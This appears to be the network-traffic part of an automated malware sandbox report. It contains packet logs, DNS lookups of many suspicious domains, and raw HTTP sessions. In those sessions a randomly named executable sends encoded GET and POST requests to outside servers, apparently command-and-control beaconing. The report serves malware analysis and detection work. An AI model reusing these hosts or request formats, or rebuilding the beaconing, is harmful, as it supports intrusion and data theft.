                Aug 23, 2024 04:20:46.355989933 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.356002092 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.356014013 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.356024027 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.356034040 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.356089115 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.356101990 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.356117964 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:46.356205940 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:46.356206894 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.356219053 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.356278896 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:46.361094952 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.361114025 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.361125946 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.361205101 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.361216068 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.361232996 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:46.361321926 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:46.444237947 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.444256067 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.444444895 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.444595098 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:46.444595098 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:46.447525978 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:46.455843925 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:51.619263887 CEST4976280192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:51.624161959 CEST8049762213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:51.624241114 CEST4976280192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:51.727108002 CEST4976280192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:51.732048035 CEST8049762213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:52.510644913 CEST8049762213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:52.510668039 CEST8049762213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:52.510680914 CEST8049762213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:52.510693073 CEST8049762213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:52.510704994 CEST8049762213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:52.510714054 CEST8049762213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:52.510744095 CEST4976280192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:52.510823965 CEST4976280192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:53.241566896 CEST4976280192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:54.261576891 CEST4976380192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:54.266504049 CEST8049763213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:54.266707897 CEST4976380192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:54.268488884 CEST4976380192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:54.273344040 CEST8049763213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:54.962217093 CEST8049763213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:54.962238073 CEST8049763213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:54.962254047 CEST8049763213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:54.962325096 CEST4976380192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:54.965553045 CEST8049763213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:54.965564966 CEST8049763213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:54.965621948 CEST4976380192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:55.772794962 CEST4976380192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:56.793711901 CEST4976480192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:56.798762083 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:56.804831028 CEST4976480192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:56.804831028 CEST4976480192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:56.809696913 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:56.809706926 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:56.809725046 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:56.809734106 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:56.809741974 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:56.809901953 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:56.809911966 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:56.809959888 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:56.809968948 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:57.530765057 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:57.530777931 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:57.530788898 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:57.530802011 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:57.530827045 CEST4976480192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:57.530869961 CEST4976480192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:57.531040907 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:57.531157970 CEST8049764213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:57.531199932 CEST4976480192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:58.319741011 CEST4976480192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:59.339202881 CEST4976580192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:59.344012976 CEST8049765213.145.228.16192.168.2.4
                Aug 23, 2024 04:20:59.344089031 CEST4976580192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:59.346244097 CEST4976580192.168.2.4213.145.228.16
                Aug 23, 2024 04:20:59.351063967 CEST8049765213.145.228.16192.168.2.4
                Aug 23, 2024 04:21:00.064162016 CEST8049765213.145.228.16192.168.2.4
                Aug 23, 2024 04:21:00.064182997 CEST8049765213.145.228.16192.168.2.4
                Aug 23, 2024 04:21:00.064198971 CEST8049765213.145.228.16192.168.2.4
                Aug 23, 2024 04:21:00.064857006 CEST4976580192.168.2.4213.145.228.16
                Aug 23, 2024 04:21:00.068008900 CEST8049765213.145.228.16192.168.2.4
                Aug 23, 2024 04:21:00.068150043 CEST8049765213.145.228.16192.168.2.4
                Aug 23, 2024 04:21:00.068167925 CEST4976580192.168.2.4213.145.228.16
                Aug 23, 2024 04:21:00.071594954 CEST4976580192.168.2.4213.145.228.16
                Aug 23, 2024 04:21:00.072402000 CEST4976580192.168.2.4213.145.228.16
                Aug 23, 2024 04:21:00.077188015 CEST8049765213.145.228.16192.168.2.4
                Aug 23, 2024 04:21:05.195777893 CEST4976680192.168.2.491.195.240.19
                Aug 23, 2024 04:21:05.200650930 CEST804976691.195.240.19192.168.2.4
                Aug 23, 2024 04:21:05.200730085 CEST4976680192.168.2.491.195.240.19
                Aug 23, 2024 04:21:05.202802896 CEST4976680192.168.2.491.195.240.19
                Aug 23, 2024 04:21:05.207561016 CEST804976691.195.240.19192.168.2.4
                Aug 23, 2024 04:21:05.837100983 CEST804976691.195.240.19192.168.2.4
                Aug 23, 2024 04:21:05.837124109 CEST804976691.195.240.19192.168.2.4
                Aug 23, 2024 04:21:05.837188959 CEST4976680192.168.2.491.195.240.19
                Aug 23, 2024 04:21:06.713589907 CEST4976680192.168.2.491.195.240.19
                Aug 23, 2024 04:21:07.730258942 CEST4976780192.168.2.491.195.240.19
                Aug 23, 2024 04:21:07.735301971 CEST804976791.195.240.19192.168.2.4
                Aug 23, 2024 04:21:07.735371113 CEST4976780192.168.2.491.195.240.19
                Aug 23, 2024 04:21:07.737508059 CEST4976780192.168.2.491.195.240.19
                Aug 23, 2024 04:21:07.742331982 CEST804976791.195.240.19192.168.2.4
                Aug 23, 2024 04:21:08.371984959 CEST804976791.195.240.19192.168.2.4
                Aug 23, 2024 04:21:08.372037888 CEST804976791.195.240.19192.168.2.4
                Aug 23, 2024 04:21:08.372143030 CEST4976780192.168.2.491.195.240.19
                Aug 23, 2024 04:21:09.242371082 CEST4976780192.168.2.491.195.240.19
                Aug 23, 2024 04:21:10.263542891 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:10.268471003 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.268624067 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:10.275573015 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:10.280447960 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280467987 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280499935 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280510902 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280523062 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280628920 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280637980 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280647039 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280656099 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.901503086 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.944772005 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:10.997838020 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.997920990 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:11.772892952 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:12.793906927 CEST4976980192.168.2.491.195.240.19
                Aug 23, 2024 04:21:12.798975945 CEST804976991.195.240.19192.168.2.4
                Aug 23, 2024 04:21:12.801750898 CEST4976980192.168.2.491.195.240.19
                Aug 23, 2024 04:21:12.805797100 CEST4976980192.168.2.491.195.240.19
                Aug 23, 2024 04:21:12.810576916 CEST804976991.195.240.19192.168.2.4
                Aug 23, 2024 04:21:13.440695047 CEST804976991.195.240.19192.168.2.4
                Aug 23, 2024 04:21:13.440716982 CEST804976991.195.240.19192.168.2.4
                Aug 23, 2024 04:21:13.440846920 CEST4976980192.168.2.491.195.240.19
                Aug 23, 2024 04:21:13.443298101 CEST4976980192.168.2.491.195.240.19
                Aug 23, 2024 04:21:13.448055029 CEST804976991.195.240.19192.168.2.4
                Aug 23, 2024 04:21:26.543554068 CEST4977080192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:26.548405886 CEST8049770172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:26.551661015 CEST4977080192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:26.554316044 CEST4977080192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:26.559109926 CEST8049770172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:28.069752932 CEST4977080192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:28.075301886 CEST8049770172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:28.075788975 CEST4977080192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:29.088607073 CEST4977180192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:29.093663931 CEST8049771172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:29.093806982 CEST4977180192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:29.095901966 CEST4977180192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:29.100708961 CEST8049771172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:30.603595972 CEST4977180192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:30.608813047 CEST8049771172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:30.611701012 CEST4977180192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:31.626210928 CEST4977280192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:31.631227016 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.631294012 CEST4977280192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:31.634447098 CEST4977280192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:31.639522076 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639559984 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639581919 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639592886 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639601946 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639612913 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639703035 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639714003 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639722109 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:33.147886992 CEST4977280192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:33.153525114 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:33.153582096 CEST4977280192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:34.167562008 CEST4977380192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:34.172516108 CEST8049773172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:34.175704002 CEST4977380192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:34.179558992 CEST4977380192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:34.184338093 CEST8049773172.67.210.102192.168.2.4
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Aug 23, 2024 04:18:26.767481089 CEST | 58324 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:18:26.787959099 CEST | 53 | 58324 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:18:42.525643110 CEST | 56354 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:18:42.559762955 CEST | 53 | 56354 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:18:56.093818903 CEST | 56276 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:18:56.102713108 CEST | 53 | 56276 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:19:04.240031958 CEST | 50242 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:19:04.255341053 CEST | 53 | 50242 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:19:12.322206974 CEST | 55778 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:19:12.541707993 CEST | 53 | 55778 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:19:27.354453087 CEST | 54019 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:19:27.387181044 CEST | 53 | 54019 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:19:35.463964939 CEST | 63347 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:19:36.075088024 CEST | 53 | 63347 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:19:49.613756895 CEST | 58511 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:19:49.704596996 CEST | 53 | 58511 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:20:03.494487047 CEST | 61305 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:20:03.925129890 CEST | 53 | 61305 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:20:38.119743109 CEST | 57612 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:20:38.139714956 CEST | 53 | 57612 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:20:51.567627907 CEST | 58543 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:20:51.602710962 CEST | 53 | 58543 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:21:05.112663031 CEST | 58380 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:21:05.192879915 CEST | 53 | 58380 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:21:18.448021889 CEST | 50177 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:21:18.460922003 CEST | 53 | 50177 | 1.1.1.1 | 192.168.2.4
                Aug 23, 2024 04:21:26.526299000 CEST | 59404 | 53 | 192.168.2.4 | 1.1.1.1
                Aug 23, 2024 04:21:26.538875103 CEST | 53 | 59404 | 1.1.1.1 | 192.168.2.4
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Aug 23, 2024 04:18:26.767481089 CEST | 192.168.2.4 | 1.1.1.1 | 0x8cb | Standard query (0) | www.hprlz.cz | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:18:42.525643110 CEST | 192.168.2.4 | 1.1.1.1 | 0xa130 | Standard query (0) | www.catherineviskadi.com | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:18:56.093818903 CEST | 192.168.2.4 | 1.1.1.1 | 0x71bb | Standard query (0) | www.hatercoin.online | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:04.240031958 CEST | 192.168.2.4 | 1.1.1.1 | 0xfcee | Standard query (0) | www.fourgrouw.cfd | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:12.322206974 CEST | 192.168.2.4 | 1.1.1.1 | 0xd239 | Standard query (0) | www.bfiworkerscomp.com | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:27.354453087 CEST | 192.168.2.4 | 1.1.1.1 | 0xffd0 | Standard query (0) | www.tinmapco.com | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:35.463964939 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ae6 | Standard query (0) | www.xn--fhq1c541j0zr.com | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:49.613756895 CEST | 192.168.2.4 | 1.1.1.1 | 0xe63a | Standard query (0) | www.xn--matfrmn-jxa4m.se | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:20:03.494487047 CEST | 192.168.2.4 | 1.1.1.1 | 0xe987 | Standard query (0) | www.anuts.top | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:20:38.119743109 CEST | 192.168.2.4 | 1.1.1.1 | 0x6a79 | Standard query (0) | www.telwisey.info | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:20:51.567627907 CEST | 192.168.2.4 | 1.1.1.1 | 0x35b6 | Standard query (0) | www.sandranoll.com | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:21:05.112663031 CEST | 192.168.2.4 | 1.1.1.1 | 0xa78f | Standard query (0) | www.gipsytroya.com | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:21:18.448021889 CEST | 192.168.2.4 | 1.1.1.1 | 0x1c1e | Standard query (0) | www.helpers-lion.online | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:21:26.526299000 CEST | 192.168.2.4 | 1.1.1.1 | 0x1268 | Standard query (0) | www.dmtxwuatbz.cc | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Aug 23, 2024 04:18:26.787959099 CEST | 1.1.1.1 | 192.168.2.4 | 0x8cb | No error (0) | www.hprlz.cz |  | 5.44.111.162 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:18:42.559762955 CEST | 1.1.1.1 | 192.168.2.4 | 0xa130 | No error (0) | www.catherineviskadi.com |  | 217.160.0.106 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:18:56.102713108 CEST | 1.1.1.1 | 192.168.2.4 | 0x71bb | Name error (3) | www.hatercoin.online | none | none | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:04.255341053 CEST | 1.1.1.1 | 192.168.2.4 | 0xfcee | Name error (3) | www.fourgrouw.cfd | none | none | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:12.541707993 CEST | 1.1.1.1 | 192.168.2.4 | 0xd239 | No error (0) | www.bfiworkerscomp.com |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:27.387181044 CEST | 1.1.1.1 | 192.168.2.4 | 0xffd0 | Name error (3) | www.tinmapco.com | none | none | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:36.075088024 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ae6 | No error (0) | www.xn--fhq1c541j0zr.com |  | 43.252.167.188 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:49.704596996 CEST | 1.1.1.1 | 192.168.2.4 | 0xe63a | No error (0) | www.xn--matfrmn-jxa4m.se |  | 194.9.94.85 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:19:49.704596996 CEST | 1.1.1.1 | 192.168.2.4 | 0xe63a | No error (0) | www.xn--matfrmn-jxa4m.se |  | 194.9.94.86 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:20:03.925129890 CEST | 1.1.1.1 | 192.168.2.4 | 0xe987 | No error (0) | www.anuts.top |  | 23.251.54.212 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:20:38.139714956 CEST | 1.1.1.1 | 192.168.2.4 | 0x6a79 | No error (0) | www.telwisey.info |  | 199.192.19.19 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:20:51.602710962 CEST | 1.1.1.1 | 192.168.2.4 | 0x35b6 | No error (0) | www.sandranoll.com |  | 213.145.228.16 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:21:05.192879915 CEST | 1.1.1.1 | 192.168.2.4 | 0xa78f | No error (0) | www.gipsytroya.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
                Aug 23, 2024 04:21:05.192879915 CEST | 1.1.1.1 | 192.168.2.4 | 0xa78f | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:21:18.460922003 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c1e | Name error (3) | www.helpers-lion.online | none | none | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:21:26.538875103 CEST | 1.1.1.1 | 192.168.2.4 | 0x1268 | No error (0) | www.dmtxwuatbz.cc |  | 172.67.210.102 | A (IP address) | IN (0x0001) | false
                Aug 23, 2024 04:21:26.538875103 CEST | 1.1.1.1 | 192.168.2.4 | 0x1268 | No error (0) | www.dmtxwuatbz.cc |  | 104.21.45.56 | A (IP address) | IN (0x0001) | false
                • www.hprlz.cz
                • www.catherineviskadi.com
                • www.bfiworkerscomp.com
                • www.xn--fhq1c541j0zr.com
                • www.xn--matfrmn-jxa4m.se
                • www.anuts.top
                • www.telwisey.info
                • www.sandranoll.com
                • www.gipsytroya.com
                • www.dmtxwuatbz.cc
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.4 | 49736 | 5.44.111.162 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:18:26.800393105 CEST | 506 | OUT | GET /w6qg/?bB7L5=DPt0-rQpMXpt&AZOTcfex=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.hprlz.cz
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:18:27.482528925 CEST | 745 | IN | HTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Fri, 23 Aug 2024 02:18:27 GMT
                Content-Type: text/html; charset=iso-8859-1
                Content-Length: 387
                Connection: close
                Location: https://www.hprlz.cz/w6qg/?bB7L5=DPt0-rQpMXpt&AZOTcfex=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 62 42 37 4c 35 3d 44 50 74 30 2d 72 51 70 4d 58 70 74 26 61 6d 70 3b 41 5a 4f 54 63 66 65 78 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 79 62 37 4b 39 33 6a 4a 33 41 6b 63 68 42 63 32 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 79 68 4a 2b 4e 49 6b 43 44 4c 39 2f 38 50 35 33 71 36 [TRUNCATED]
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?bB7L5=DPt0-rQpMXpt&amp;AZOTcfex=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=">here</a>.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.4 | 49737 | 217.160.0.106 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:18:42.569592953 CEST | 796 | OUT | POST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d
